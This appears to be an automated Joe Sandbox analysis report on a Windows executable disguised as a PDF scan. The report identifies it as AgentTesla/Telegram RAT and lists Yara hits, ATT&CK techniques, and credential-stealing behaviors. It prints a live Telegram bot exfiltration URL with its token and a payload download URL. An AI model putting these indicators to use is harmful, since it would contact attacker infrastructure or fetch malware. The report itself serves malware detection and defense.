                      Source: Yara matchFile source: 0.2.rScan_0984829339_PDF.exe.3e96b78.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.rScan_0984829339_PDF.exe.3e96b78.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2280814775.0000000003E81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2451764397.00000000033C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2262633916.0000000002F85000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2482319443.00000000040A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.2449463464.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2280814775.0000000003F54000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.2453773157.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.3430262414.0000000002871000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2482319443.0000000004164000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rScan_0984829339_PDF.exe PID: 6272, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 1472, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Guid.exe PID: 5588, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6708, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Yara detected AgentTesla
                      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                      Source: Yara matchFile source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.Guid.exe.40bbf88.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.Guid.exe.40bbf88.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.rScan_0984829339_PDF.exe.3e96b78.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.rScan_0984829339_PDF.exe.3e96b78.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2280814775.0000000003E81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.2453773157.0000000002FDA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2451764397.00000000033C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2262633916.0000000002F85000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2482319443.00000000040A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.2453773157.0000000002FBE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.3430262414.00000000028DB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.3430262414.00000000028BF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.2449463464.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2280814775.0000000003F54000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.2453773157.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.3430262414.0000000002871000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2482319443.0000000004164000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rScan_0984829339_PDF.exe PID: 6272, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 1472, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Guid.exe PID: 5588, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6708, type: MEMORYSTR
                      Yara detected Telegram RAT
                      Source: Yara matchFile source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.Guid.exe.40bbf88.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.Guid.exe.40bbf88.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.rScan_0984829339_PDF.exe.3e96b78.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.rScan_0984829339_PDF.exe.3e96b78.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2280814775.0000000003E81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2451764397.00000000033C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2262633916.0000000002F85000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2482319443.00000000040A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.2449463464.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2280814775.0000000003F54000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.2453773157.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.3430262414.0000000002871000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2482319443.0000000004164000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rScan_0984829339_PDF.exe PID: 6272, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 1472, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Guid.exe PID: 5588, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6708, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity Information111
                      Scripting                      		Valid Accounts121
                      Windows Management Instrumentation                      		111
                      Scripting                      		1
                      DLL Side-Loading                      		1
                      Disable or Modify Tools                      		2
                      OS Credential Dumping                      		2
                      File and Directory Discovery                      		Remote Services1
                      Archive Collected Data                      		1
                      Web Service                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Scheduled Task/Job                      		1
                      DLL Side-Loading                      		11
                      Process Injection                      		1
                      Obfuscated Files or Information                      		1
                      Credentials in Registry                      		24
                      System Information Discovery                      		Remote Desktop Protocol2
                      Data from Local System                      		1
                      Ingress Tool Transfer                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAt1
                      Scheduled Task/Job                      		1
                      Scheduled Task/Job                      		1
                      Software Packing                      		Security Account Manager311
                      Security Software Discovery                      		SMB/Windows Admin Shares1
                      Email Collection                      		11
                      Encrypted Channel                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCron2
                      Registry Run Keys / Startup Folder                      		2
                      Registry Run Keys / Startup Folder                      		1
                      DLL Side-Loading                      		NTDS1
                      Process Discovery                      		Distributed Component Object ModelInput Capture3
                      Non-Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      Masquerading                      		LSA Secrets141
                      Virtualization/Sandbox Evasion                      		SSHKeylogging4
                      Application Layer Protocol                      		Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts141
                      Virtualization/Sandbox Evasion                      		Cached Domain Credentials1
                      Application Window Discovery                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                      Process Injection                      		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1534432 Sample: rScan_0984829339_PDF.exe Startdate: 15/10/2024 Architecture: WINDOWS Score: 100 30 api.telegram.org 2->30 32 rubberpartsmanufacturers.com 2->32 48 Suricata IDS alerts for network traffic 2->48 50 Found malware configuration 2->50 52 Malicious sample detected (through community Yara rule) 2->52 56 11 other signatures 2->56 8 rScan_0984829339_PDF.exe 15 5 2->8         started        13 wscript.exe 1 2->13         started        signatures3 54 Uses the Telegram API (likely for C&C communication) 30->54 process4 dnsIp5 34 rubberpartsmanufacturers.com 103.191.208.122, 443, 49711, 49804 AARNET-AS-APAustralianAcademicandResearchNetworkAARNe unknown 8->34 24 C:\Users\user\AppData\Roamingbehaviorgraphuid.exe, PE32 8->24 dropped 26 C:\Users\user\AppData\Roaming\...behaviorgraphuid.vbs, ASCII 8->26 dropped 28 C:\Users\user\...behaviorgraphuid.exe:Zone.Identifier, ASCII 8->28 dropped 66 Drops VBS files to the startup folder 8->66 68 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 8->68 15 InstallUtil.exe 14 2 8->15         started        70 Windows Scripting host queries suspicious COM object (likely to drop second stage) 13->70 19 Guid.exe 14 2 13->19         started        file6 signatures7 process8 dnsIp9 36 api.telegram.org 149.154.167.220, 443, 49739, 49831 TELEGRAMRU United Kingdom 15->36 38 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 15->38 40 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 15->40 42 Tries to steal Mail credentials (via file / registry access) 15->42 44 Multi AV Scanner detection for dropped file 19->44 46 Machine Learning detection for dropped file 19->46 21 InstallUtil.exe 2 19->21         started        signatures10 process11 signatures12 58 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 21->58 60 Tries to steal Mail credentials (via file / registry access) 21->60 62 Tries to harvest and steal ftp login credentials 21->62 64 Tries to harvest and steal browser information (history, passwords, etc) 21->64

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      rScan_0984829339_PDF.exe32%ReversingLabsByteCode-MSIL.Trojan.Generic
                      rScan_0984829339_PDF.exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\Guid.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\Guid.exe32%ReversingLabsByteCode-MSIL.Trojan.Generic

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://stackoverflow.com/q/14436606/233540%URL Reputationsafe
                      https://account.dyn.com/0%URL Reputationsafe
                      https://stackoverflow.com/q/11564914/23354;0%URL Reputationsafe
                      https://stackoverflow.com/q/2152978/233540%URL Reputationsafe
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      rubberpartsmanufacturers.com
                      		103.191.208.122
                      		truefalse
                        		unknown
                        api.telegram.org
                        		149.154.167.220
                        		truetrue
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          https://api.telegram.org/bot7162202130:AAHTxdkbyFCUMWCzyf9jutDYYrL6rqEAva4/sendDocumenttrue
                            		unknown
                            https://rubberpartsmanufacturers.com/hunziq/Sgtuwurbrz.mp3false
                              		unknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              https://github.com/mgravell/protobuf-netirScan_0984829339_PDF.exe, 00000000.00000002.2284754517.0000000006850000.00000004.08000000.00040000.00000000.sdmp, Guid.exe, 00000005.00000002.2482319443.000000000441E000.00000004.00000800.00020000.00000000.sdmp, Guid.exe, 00000005.00000002.2482319443.0000000004164000.00000004.00000800.00020000.00000000.sdmpfalse
                                		unknown
                                https://stackoverflow.com/q/14436606/23354rScan_0984829339_PDF.exe, 00000000.00000002.2262633916.0000000002DA7000.00000004.00000800.00020000.00000000.sdmp, rScan_0984829339_PDF.exe, 00000000.00000002.2284754517.0000000006850000.00000004.08000000.00040000.00000000.sdmp, Guid.exe, 00000005.00000002.2482319443.000000000441E000.00000004.00000800.00020000.00000000.sdmp, Guid.exe, 00000005.00000002.2451764397.0000000003018000.00000004.00000800.00020000.00000000.sdmp, Guid.exe, 00000005.00000002.2482319443.0000000004164000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://account.dyn.com/rScan_0984829339_PDF.exe, 00000000.00000002.2280814775.0000000003E81000.00000004.00000800.00020000.00000000.sdmp, rScan_0984829339_PDF.exe, 00000000.00000002.2262633916.0000000002F85000.00000004.00000800.00020000.00000000.sdmp, rScan_0984829339_PDF.exe, 00000000.00000002.2280814775.0000000003F54000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2449463464.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Guid.exe, 00000005.00000002.2451764397.00000000033C2000.00000004.00000800.00020000.00000000.sdmp, Guid.exe, 00000005.00000002.2482319443.00000000040A7000.00000004.00000800.00020000.00000000.sdmp, Guid.exe, 00000005.00000002.2482319443.0000000004164000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://api.telegram.orgInstallUtil.exe, 00000002.00000002.2453773157.0000000002FC6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3430262414.00000000028C7000.00000004.00000800.00020000.00000000.sdmptrue
                                  		unknown
                                  https://github.com/mgravell/protobuf-netJrScan_0984829339_PDF.exe, 00000000.00000002.2284754517.0000000006850000.00000004.08000000.00040000.00000000.sdmp, Guid.exe, 00000005.00000002.2482319443.000000000441E000.00000004.00000800.00020000.00000000.sdmp, Guid.exe, 00000005.00000002.2482319443.0000000004164000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://api.telegram.org/bot7162202130:AAHTxdkbyFCUMWCzyf9jutDYYrL6rqEAva4/rScan_0984829339_PDF.exe, 00000000.00000002.2280814775.0000000003E81000.00000004.00000800.00020000.00000000.sdmp, rScan_0984829339_PDF.exe, 00000000.00000002.2262633916.0000000002F85000.00000004.00000800.00020000.00000000.sdmp, rScan_0984829339_PDF.exe, 00000000.00000002.2280814775.0000000003F54000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2453773157.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2449463464.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Guid.exe, 00000005.00000002.2451764397.00000000033C2000.00000004.00000800.00020000.00000000.sdmp, Guid.exe, 00000005.00000002.2482319443.00000000040A7000.00000004.00000800.00020000.00000000.sdmp, Guid.exe, 00000005.00000002.2482319443.0000000004164000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3430262414.0000000002871000.00000004.00000800.00020000.00000000.sdmptrue
                                      		unknown
                                      https://stackoverflow.com/q/11564914/23354;rScan_0984829339_PDF.exe, 00000000.00000002.2284754517.0000000006850000.00000004.08000000.00040000.00000000.sdmp, Guid.exe, 00000005.00000002.2482319443.000000000441E000.00000004.00000800.00020000.00000000.sdmp, Guid.exe, 00000005.00000002.2482319443.0000000004164000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://stackoverflow.com/q/2152978/23354rScan_0984829339_PDF.exe, 00000000.00000002.2284754517.0000000006850000.00000004.08000000.00040000.00000000.sdmp, Guid.exe, 00000005.00000002.2482319443.000000000441E000.00000004.00000800.00020000.00000000.sdmp, Guid.exe, 00000005.00000002.2482319443.0000000004164000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://github.com/mgravell/protobuf-netrScan_0984829339_PDF.exe, 00000000.00000002.2284754517.0000000006850000.00000004.08000000.00040000.00000000.sdmp, Guid.exe, 00000005.00000002.2482319443.000000000441E000.00000004.00000800.00020000.00000000.sdmp, Guid.exe, 00000005.00000002.2482319443.0000000004164000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		unknown
                                        http://api.telegram.orgInstallUtil.exe, 00000002.00000002.2453773157.0000000002FDA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3430262414.00000000028DB000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		unknown
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namerScan_0984829339_PDF.exe, 00000000.00000002.2262633916.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2453773157.0000000002FC6000.00000004.00000800.00020000.00000000.sdmp, Guid.exe, 00000005.00000002.2451764397.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3430262414.00000000028C7000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://rubberpartsmanufacturers.comrScan_0984829339_PDF.exe, 00000000.00000002.2262633916.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, Guid.exe, 00000005.00000002.2451764397.0000000002F71000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		unknown

                                            World Map of Contacted IPs

                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs

                                            Public IPs

                                            IPDomainCountryFlagASNASN NameMalicious
                                            149.154.167.220
                                            		api.telegram.orgUnited Kingdom
                                            		62041TELEGRAMRUtrue
                                            103.191.208.122
                                            		rubberpartsmanufacturers.comunknown
                                            		7575AARNET-AS-APAustralianAcademicandResearchNetworkAARNefalse

                                            General Information

                                            Joe Sandbox version:41.0.0 Charoite
                                            Analysis ID:1534432
                                            Start date and time:2024-10-15 21:31:04 +02:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 7m 7s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                            Number of analysed new started processes analysed:11
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample name:rScan_0984829339_PDF.exe
                                            Detection:MAL
                                            Classification:mal100.troj.spyw.expl.evad.winEXE@8/3@2/2
                                            EGA Information:
                                            • Successful, ratio: 50%
                                            HCA Information:
                                            • Successful, ratio: 92%
                                            • Number of executed functions: 264
                                            • Number of non-executed functions: 7
                                            Cookbook Comments:
                                            • Found application associated with file extension: .exe

                                            Warnings

                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                                            • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                            • Execution Graph export aborted for target Guid.exe, PID 5588 because it is empty
                                            • Execution Graph export aborted for target rScan_0984829339_PDF.exe, PID 6272 because it is empty
                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                            • VT rate limit hit for: rScan_0984829339_PDF.exe

                                            Simulations

                                            Behavior and APIs

                                            TimeTypeDescription
                                            15:31:59API Interceptor69x Sleep call for process: rScan_0984829339_PDF.exe modified
                                            15:32:24API Interceptor30x Sleep call for process: Guid.exe modified
                                            21:32:14AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Guid.vbs

                                            Joe Sandbox View / Context

                                            IPs

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            149.154.167.220na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              z95ReviseInvoice_USD_.exeGet hashmaliciousMassLogger RATBrowse
                                                Qaovmgmn.exeGet hashmaliciousSnake KeyloggerBrowse
                                                  cyCsE47YV3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                      RFQ_56783295_12538_15.10.2024.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                        INQ-PORT_9290029992-pdf.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          Scan-Purchase Order3550..docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            RFQ-2413AM-KE2800.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              PO-10-15-2024.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                103.191.208.122Request for Quotation-537262227-04.exeGet hashmaliciousAgentTeslaBrowse
                                                                  AYV0eq1Gyc.exeGet hashmaliciousAgentTeslaBrowse
                                                                    GEFA-Order 232343-68983689.exeGet hashmaliciousAgentTeslaBrowse
                                                                      GEFA-Order 232343-68983689.exeGet hashmaliciousAgentTeslaBrowse

                                                                        Domains

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        api.telegram.orgna.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 149.154.167.220
                                                                        z95ReviseInvoice_USD_.exeGet hashmaliciousMassLogger RATBrowse
                                                                        • 149.154.167.220
                                                                        Qaovmgmn.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                        • 149.154.167.220
                                                                        cyCsE47YV3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 149.154.167.220
                                                                        na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 149.154.167.220
                                                                        RFQ_56783295_12538_15.10.2024.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                        • 149.154.167.220
                                                                        INQ-PORT_9290029992-pdf.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 149.154.167.220
                                                                        Scan-Purchase Order3550..docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 149.154.167.220
                                                                        RFQ-2413AM-KE2800.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 149.154.167.220
                                                                        PO-10-15-2024.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 149.154.167.220
                                                                        rubberpartsmanufacturers.comRequest for Quotation-537262227-04.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 103.191.208.122
                                                                        AYV0eq1Gyc.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 103.191.208.122
                                                                        GEFA-Order 232343-68983689.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 103.191.208.122
                                                                        GEFA-Order 232343-68983689.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 103.191.208.122

                                                                        ASNs

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        TELEGRAMRUna.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 149.154.167.220
                                                                        z95ReviseInvoice_USD_.exeGet hashmaliciousMassLogger RATBrowse
                                                                        • 149.154.167.220
                                                                        Qaovmgmn.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                        • 149.154.167.220
                                                                        cyCsE47YV3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 149.154.167.220
                                                                        na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 149.154.167.220
                                                                        RFQ_56783295_12538_15.10.2024.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                        • 149.154.167.220
                                                                        INQ-PORT_9290029992-pdf.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 149.154.167.220
                                                                        Scan-Purchase Order3550..docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 149.154.167.220
                                                                        RFQ-2413AM-KE2800.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 149.154.167.220
                                                                        PO-10-15-2024.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 149.154.167.220
                                                                        AARNET-AS-APAustralianAcademicandResearchNetworkAARNeSecuriteInfo.com.FileRepMalware.14694.23524.exeGet hashmaliciousUnknownBrowse
                                                                        • 103.167.234.130
                                                                        Quote.exeGet hashmaliciousRemcosBrowse
                                                                        • 103.186.117.77
                                                                        na.elfGet hashmaliciousMirai, MoobotBrowse
                                                                        • 103.136.131.127
                                                                        na.elfGet hashmaliciousMirai, MoobotBrowse
                                                                        • 103.177.149.59
                                                                        na.elfGet hashmaliciousMirai, MoobotBrowse
                                                                        • 157.85.109.76
                                                                        4Y8rbNhkaR.elfGet hashmaliciousMirai, OkiruBrowse
                                                                        • 103.128.231.194
                                                                        arm.nn-20241014-0317.elfGet hashmaliciousMirai, OkiruBrowse
                                                                        • 103.162.50.15
                                                                        mips.elfGet hashmaliciousMirai, MoobotBrowse
                                                                        • 103.187.127.142
                                                                        sh4.elfGet hashmaliciousMirai, MoobotBrowse
                                                                        • 157.85.109.79
                                                                        jYEvdBHMOI.elfGet hashmaliciousMiraiBrowse
                                                                        • 103.170.60.254

                                                                        JA3 Fingerprints

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        3b5074b1b5d032e5620f69f9f700ff0ehttps://forms.zohopublic.com/pharmops1/form/DOCUSIGNREVIEW/formperma/hzyn6gH_uB4k6Kv8lque19zZem5KI3as5uJYGnlnfacGet hashmaliciousHTMLPhisherBrowse
                                                                        • 149.154.167.220
                                                                        • 103.191.208.122
                                                                        z95ReviseInvoice_USD_.exeGet hashmaliciousMassLogger RATBrowse
                                                                        • 149.154.167.220
                                                                        • 103.191.208.122
                                                                        https://whimsical.com/maryland-deli-provisions-BvzVjYjzBeaob2dyDXoWU7Get hashmaliciousUnknownBrowse
                                                                        • 149.154.167.220
                                                                        • 103.191.208.122
                                                                        Play.VN-_E_CQDM.htmlGet hashmaliciousUnknownBrowse
                                                                        • 149.154.167.220
                                                                        • 103.191.208.122
                                                                        Contract-476939299.pdfGet hashmaliciousUnknownBrowse
                                                                        • 149.154.167.220
                                                                        • 103.191.208.122
                                                                        Qaovmgmn.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                        • 149.154.167.220
                                                                        • 103.191.208.122
                                                                        KULI500796821_PO20000003.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                        • 149.154.167.220
                                                                        • 103.191.208.122
                                                                        https://ghgeacb.r.bh.d.sendibt3.com/tr/cl/9i6x1nV2FKKN7vq8mr3OOEBBJCa885_P6VOZmrd6IAYZGxQqgx9-g2thnbfEyM7jcWMQq10DSkzoGE3hrRIOhqWmDMPB-v-Vs_HL2v8poWMBuT3diKJIsJCPnKr9QKNE7_LQcdnWzzdGVm3zkkF8zFTuvWpKy9uYId6Fqvw2hXfQsOcPQhS-r0DxYjl5NQ8-Qb21PAbLEM_Rbhi2eb4YBhrAe2x12cQGxRcawRCOj3pfpwGLu7SYcJdrZL0t9GyigTigzg3YlzmaeYqZCQsLc2qAheh9wzUxvwGet hashmaliciousUnknownBrowse
                                                                        • 149.154.167.220
                                                                        • 103.191.208.122
                                                                        webhook.ps1Get hashmaliciousUnknownBrowse
                                                                        • 149.154.167.220
                                                                        • 103.191.208.122
                                                                        S_code_runner.ps1Get hashmaliciousUnknownBrowse
                                                                        • 149.154.167.220
                                                                        • 103.191.208.122

                                                                        Dropped Files

                                                                        No context

